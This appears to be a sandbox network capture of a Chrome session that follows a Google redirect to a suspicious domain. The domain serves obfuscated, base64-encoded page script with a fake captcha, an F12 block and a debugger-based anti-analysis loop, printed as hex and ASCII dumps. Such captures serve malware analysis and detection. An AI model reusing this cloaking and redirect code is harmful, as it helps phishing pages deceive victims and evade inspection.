                                                                                                                    2024-11-25 18:52:32 UTC435INData Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e
                                                                                                                    Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.449791216.58.208.2284432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:34 UTC1139OUTGET /url?q=https%3A%2F%2Fj9.valcondunar.com%2Fb3k54%2F&sa=D&sntz=1&usg=AOvVaw0HL9wZZbhgOP55-NM_TPJg HTTP/1.1
                                                                                                                    Host: www.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                    Referer: https://sites.google.com/
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Cookie: NID=519=VtVOjXt6zuhy-2YKtTERKDmpWoK0o-Dj_kJNfbc4lzsHckeG-pox1jah9rbPwMfgsCbFlReKUmAtgYnXmJ2O0IA7HHWm8Hq8HDUMgvf80mMHXbVBw5H4uNG50lSf57Ofx3gSXdLSNi9i42fTEUs34VcDQXfj8bzivXWpPGJg99XByGFGMXxxp0FNZbckcA28
                                                                                                                    2024-11-25 18:52:35 UTC372INHTTP/1.1 200 OK
                                                                                                                    Location: https://j9.valcondunar.com/b3k54/
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: unload=()
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:35 GMT
                                                                                                                    Server: gws
                                                                                                                    Content-Length: 355
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2024-11-25 18:52:35 UTC355INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 52 65 64 69 72 65 63 74 69 6e 67 3c 2f 54 49 54 4c 45 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6a 39 2e 76 61 6c 63 6f 6e 64 75 6e 61 72 2e 63 6f 6d 2f 62 33 6b 35 34 2f 22 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 6f 6e 4c 6f 61 64 3d 22 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 73 3a 2f 2f 6a 39 2e 76 61 6c 63 6f 6e 64 75 6e 61 72 2e 63 6f 6d 2f 62 33
                                                                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>Redirecting</TITLE><META HTTP-EQUIV="refresh" content="1; url=https://j9.valcondunar.com/b3k54/"></HEAD><BODY onLoad="location.replace('https://j9.valcondunar.com/b3


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.449796104.21.68.1324432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:38 UTC687OUTGET /b3k54/ HTTP/1.1
                                                                                                                    Host: j9.valcondunar.com
                                                                                                                    Connection: keep-alive
                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                    Referer: https://www.google.com/
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-25 18:52:39 UTC1224INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:39 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, private
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HmTspWF5To5yeMnPysU8GZpsr7MUunS98bAxUVojzG8RJOzBs9T90UgzQYRSEt7pul2Etmk5uDEkuoCtv%2FwJGO8Ertj%2F6%2FzfUh3Tp91D0Zl1urXDkPvH29PwvP1pqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=35766&sent=267&recv=86&lost=0&retrans=0&sent_bytes=347353&recv_bytes=8817&delivery_rate=3025243&cwnd=274&unsent_bytes=0&cid=70d378ea6a098968&ts=9782&x=0"
                                                                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6IktuUmNPVmhkM09vdnRKWlMzMmJ6WlE9PSIsInZhbHVlIjoiSGNKdUFlZHM4Y2Q0Mnh5eGpLRmpHVkZra2VJNDNlZHkwVWI3cEkxdDlKZDNZWkU5VWxyUjN3ZzdTaVFlSEVkd0cyUk5zUHRHMC9WZXhhTDhRTktsTE1wRGdEc293cjZwRW5ieTNuNTdiWlBUZTVYUlY3T3owVGp6RG1Kem1NWEsiLCJtYWMiOiJjYTY3MDFhMDE4OWQ2MDJhMjQzNmViMDhmYzg1Mzg3ZGU3NGFiZjc4ZWFkZjhkZWIwZTYwNGMyYzczYmEwYzQ0IiwidGFnIjoiIn0%3D; expires=Mon, 25-Nov-2024 20:52:39 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                    2024-11-25 18:52:39 UTC707INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 6c 73 64 55 39 78 55 44 5a 77 56 58 5a 69 57 6d 39 52 62 33 5a 49 53 32 46 42 4d 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 57 78 68 53 32 68 43 64 6c 5a 53 62 47 6c 30 56 48 46 30 63 58 49 34 59 58 6c 34 4d 6b 39 4c 64 55 5a 32 62 44 4d 34 59 6e 55 30 4f 55 46 57 4d 32 5a 4f 61 48 55 34 4d 6a 68 5a 54 57 39 48 52 54 52 53 4e 32 70 75 4c 7a 56 51 62 55 5a 43 56 55 52 4b 54 57 5a 57 62 43 39 47 52 47 64 34 55 56 64 74 62 56 70 74 51 58 4a 42 65 57 46 78 54 48 5a 6d 56 44 46 72 65 6b 39 71 63 30 4e 56 56 54 52 51 63 6d 49 31 62 55 56 48 4d 56 64 4d 4d 6a 55 76 4d 31 5a 70 4d 48 4a 68 4c 7a 4a 32 57 69 39 47 55 6b 6c 49 53 6c 45
                                                                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IllsdU9xUDZwVXZiWm9Rb3ZIS2FBMkE9PSIsInZhbHVlIjoiVWxhS2hCdlZSbGl0VHF0cXI4YXl4Mk9LdUZ2bDM4YnU0OUFWM2ZOaHU4MjhZTW9HRTRSN2puLzVQbUZCVURKTWZWbC9GRGd4UVdtbVptQXJBeWFxTHZmVDFrek9qc0NVVTRQcmI1bUVHMVdMMjUvM1ZpMHJhLzJ2Wi9GUklISlE
                                                                                                                    2024-11-25 18:52:39 UTC807INData Raw: 61 62 64 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 47 72 65 61 74 20 6c 65 61 64 65 72 73 20 69 6e 73 70 69 72 65 20 61 63 74 69 6f 6e 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 4d 52 33 42 68 4c 6e 5a 68 62 47 4e 76 62 6d 52 31 62 6d 46 79 4c 6d 4e 76 62 53 39 69 4d 32 73 31 4e 43 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69
                                                                                                                    Data Ascii: abd<script>/* Great leaders inspire action. */if(atob("aHR0cHM6Ly9MR3BhLnZhbGNvbmR1bmFyLmNvbS9iM2s1NC8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0i
                                                                                                                    2024-11-25 18:52:39 UTC1369INData Raw: 64 6d 55 37 44 51 6f 67 49 43 41 67 61 47 56 70 5a 32 68 30 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 66 51 30 4b 4c 6d 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 75 64 47 46 70 62 6d 56 79 4f 6a 70 69 5a 57 5a 76 63 6d 55 67 65 77 30 4b 49 43 41 67 49 47 4e 76 62 6e 52 6c 62 6e 51 36 49 43 49 69 4f 77 30 4b 49 43 41 67 49 48 42 76 63 32 6c 30 61 57 39 75 4f 69 42 68 59 6e 4e 76 62 48 56 30 5a 54 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 41 37 44 51 6f 67 49 43 41 67 62 47 56 6d 64 44 6f 67 4d 44 73 4e 43 69 41 67 49 43 42 79 61 57 64 6f 64 44 6f 67 4d 44 73 4e 43 6d 4a 76 64 48 52 76 62 54 6f 67 4d 44 73 4e 43 6d 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 61 57 31 68 5a 32 55
                                                                                                                    Data Ascii: dmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyOjpiZWZvcmUgew0KICAgIGNvbnRlbnQ6ICIiOw0KICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsNCiAgICB0b3A6IDA7DQogICAgbGVmdDogMDsNCiAgICByaWdodDogMDsNCmJvdHRvbTogMDsNCmJhY2tncm91bmQtaW1hZ2U
                                                                                                                    2024-11-25 18:52:39 UTC580INData Raw: 33 4a 6b 5a 58 49 74 63 6d 46 6b 61 58 56 7a 4f 69 41 30 63 48 67 37 44 51 6f 67 49 43 41 67 59 6d 39 34 4c 58 4e 6f 59 57 52 76 64 7a 6f 67 4d 48 42 34 49 44 4a 77 65 43 41 30 63 48 67 67 63 6d 64 69 59 53 67 77 4c 43 41 77 4c 43 41 77 4c 43 41 77 4c 6a 49 70 4f 77 30 4b 49 43 41 67 49 48 42 76 63 32 6c 30 61 57 39 75 4f 69 42 79 5a 57 78 68 64 47 6c 32 5a 54 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 69 62 33 67 67 65 77 30 4b 49 43 41 67 49 47 52 70 63 33 42 73 59 58 6b 36 49 47 5a 73 5a 58 67 37 44 51 6f 67 49 43 41 67 59 57 78 70 5a 32 34 74 61 58 52 6c 62 58 4d 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 63 6d 56 73 59 58 52 70 64 6d 55 37 44 51 70 39
                                                                                                                    Data Ascii: 3JkZXItcmFkaXVzOiA0cHg7DQogICAgYm94LXNoYWRvdzogMHB4IDJweCA0cHggcmdiYSgwLCAwLCAwLCAwLjIpOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggew0KICAgIGRpc3BsYXk6IGZsZXg7DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9
                                                                                                                    2024-11-25 18:52:39 UTC1369INData Raw: 33 38 36 32 0d 0a 36 49 44 4a 77 65 43 42 7a 62 32 78 70 5a 43 41 6a 5a 44 4e 6b 4d 32 51 7a 4f 77 30 4b 49 43 41 67 49 47 4a 76 63 6d 52 6c 63 69 31 79 59 57 52 70 64 58 4d 36 49 44 4e 77 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 79 61 57 64 6f 64 44 6f 67 4d 54 42 77 65 44 73 4e 43 69 41 67 49 43 42 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 63 6d 56 73 59 58 52 70 64 6d 55 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 6f 5a 57 4e 72 59 6d 39 34 49 47 6c 75 63 48 56 30 57 33 52 35 63 47 55 39 49 6d 4e 6f 5a 57 4e 72 59 6d 39 34 49 6c 30 36 59 32 68 6c 59 32 74 6c 5a 43 41 72 49 47 78 68 59 6d 56 73
                                                                                                                    Data Ascii: 38626IDJweCBzb2xpZCAjZDNkM2QzOw0KICAgIGJvcmRlci1yYWRpdXM6IDNweDsNCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICAgIG1hcmdpbi1yaWdodDogMTBweDsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IGlucHV0W3R5cGU9ImNoZWNrYm94Il06Y2hlY2tlZCArIGxhYmVs
                                                                                                                    2024-11-25 18:52:39 UTC1369INData Raw: 41 67 49 47 52 70 63 33 42 73 59 58 6b 36 49 47 35 76 62 6d 55 37 44 51 6f 67 49 43 41 67 5a 6d 78 6c 65 43 31 6b 61 58 4a 6c 59 33 52 70 62 32 34 36 49 47 4e 76 62 48 56 74 62 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57 31 6e 49 48 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 41 78 4d 48 42 34 4f 77 30 4b 66 51 30 4b 44
                                                                                                                    Data Ascii: AgIGRpc3BsYXk6IG5vbmU7DQogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi10b3A6IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW1nIHsNCiAgICB3aWR0aDogMTAwJTsNCiAgICBtYXJnaW4tYm90dG9tOiAxMHB4Ow0KfQ0KD
                                                                                                                    2024-11-25 18:52:39 UTC1369INData Raw: 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51
                                                                                                                    Data Ascii: KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQ
                                                                                                                    2024-11-25 18:52:39 UTC1369INData Raw: 49 43 42 6a 62 32 35 7a 64 43 42 34 52 47 39 4e 59 6d 4e 56 54 47 4a 42 49 44 30 67 4d 54 41 77 4f 77 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 74 51 30 78 35 61 6c 5a 4a 51 33 4a 56 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 35 59 6b 39 6f 61 58 70 6b 61 45 31 78 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 35 59 6b 39 6f 61 58 70 6b 61 45 31
                                                                                                                    Data Ascii: ICBjb25zdCB4RG9NYmNVTGJBID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCBtQ0x5alZJQ3JVID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCB5Yk9oaXpkaE1xID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmICh5Yk9oaXpkaE1
                                                                                                                    2024-11-25 18:52:39 UTC1369INData Raw: 55 73 33 54 30 68 50 61 30 46 42 51 55 31 42 56 55 56 34 56 56 4a 56 5a 48 64 55 54 32 78 43 54 53 74 30 51 6b 30 72 65 45 4a 4f 62 58 6c 50 5a 48 59 35 63 45 31 71 51 32 35 58 52 55 74 47 4f 44 42 50 52 7a 6c 45 4b 30 45 76 4c 30 4a 42 54 6e 56 30 51 30 35 50 63 45 4e 4f 54 31 5a 45 54 57 70 50 62 31 56 71 52 33 4a 57 52 45 39 75 56 58 56 6f 51 55 35 45 54 32 35 56 61 6b 39 74 56 58 56 6f 52 45 35 6d 61 54 64 43 56 45 74 75 56 57 70 50 62 6c 56 71 54 32 35 56 64 58 42 44 54 6d 56 77 54 55 31 6c 64 45 4a 4f 5a 58 42 44 54 6b 56 31 4d 46 68 50 64 45 52 4f 54 33 52 44 54 6b 52 54 62 31 56 71 55 32 39 56 61 6c 4e 76 56 53 74 73 51 6b 35 50 64 45 4e 4f 54 33 52 44 54 6b 39 77 51 30 35 46 52 30 55 34 64 57 68 45 54 58 70 50 62 31 56 36 54 32 39 56 65 6b 64 73
                                                                                                                    Data Ascii: Us3T0hPa0FBQU1BVUV4VVJVZHdUT2xCTSt0Qk0reEJObXlPZHY5cE1qQ25XRUtGODBPRzlEK0EvL0JBTnV0Q05PcENOT1ZETWpPb1VqR3JWRE9uVXVoQU5ET25Vak9tVXVoRE5maTdCVEtuVWpPblVqT25VdXBDTmVwTU1ldEJOZXBDTkV1MFhPdEROT3RDTkRTb1VqU29ValNvVStsQk5PdENOT3RDTk9wQ05FR0U4dWhETXpPb1V6T29Vekds
                                                                                                                    2024-11-25 18:52:39 UTC1369INData Raw: 64 4e 64 6c 4e 46 52 7a 51 32 65 55 77 76 56 30 70 48 59 30 70 35 62 6d 46 56 51 55 46 42 52 45 64 6b 52 6b 70 50 56 58 64 45 64 79 74 42 4d 45 4a 42 5a 31 70 5a 55 30 46 6e 55 54 42 74 4e 45 74 6e 51 58 6c 71 4c 32 49 7a 4d 43 39 32 4e 31 4e 35 54 7a 5a 58 51 69 39 55 53 6b 46 36 63 56 46 4b 57 6c 56 32 4e 44 4d 35 55 58 4e 51 62 6a 64 5a 56 48 59 34 57 47 67 32 64 6c 4a 4e 4e 32 59 79 63 6a 52 6d 4e 6c 56 76 56 33 45 72 56 58 46 57 59 6d 59 32 62 6d 74 47 62 30 4a 4d 56 45 70 32 4b 32 31 6b 61 43 38 32 54 46 46 57 51 54 42 79 51 6b 52 6e 4f 44 4e 54 4d 56 4e 44 53 57 78 4a 5a 48 4e 55 4c 33 5a 6d 61 44 42 4d 57 6a 4d 30 62 6d 31 71 61 45 74 6f 64 57 6c 45 55 6c 67 76 55 33 4e 52 61 47 52 69 51 33 56 54 61 6c 6c 34 54 6d 31 59 4e 55 74 61 59 57 5a 68 5a
                                                                                                                    Data Ascii: dNdlNFRzQ2eUwvV0pHY0p5bmFVQUFBREdkRkpPVXdEdytBMEJBZ1pZU0FnUTBtNEtnQXlqL2IzMC92N1N5TzZXQi9USkF6cVFKWlV2NDM5UXNQbjdZVHY4WGg2dlJNN2YycjRmNlVvV3ErVXFWYmY2bmtGb0JMVEp2K21kaC82TFFWQTByQkRnODNTMVNDSWxJZHNUL3ZmaDBMWjM0bm1qaEtodWlEUlgvU3NRaGRiQ3VTall4Tm1YNUtaYWZhZ


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.449798151.101.130.1374432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:41 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                    Host: code.jquery.com
                                                                                                                    Connection: keep-alive
                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                    Accept: */*
                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                    Referer: https://j9.valcondunar.com/
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-25 18:52:41 UTC613INHTTP/1.1 200 OK
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 89501
                                                                                                                    Server: nginx
                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Age: 2542836
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:41 GMT
                                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740073-EWR
                                                                                                                    X-Cache: HIT, HIT
                                                                                                                    X-Cache-Hits: 5889, 0
                                                                                                                    X-Timer: S1732560762.626258,VS0,VE1
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
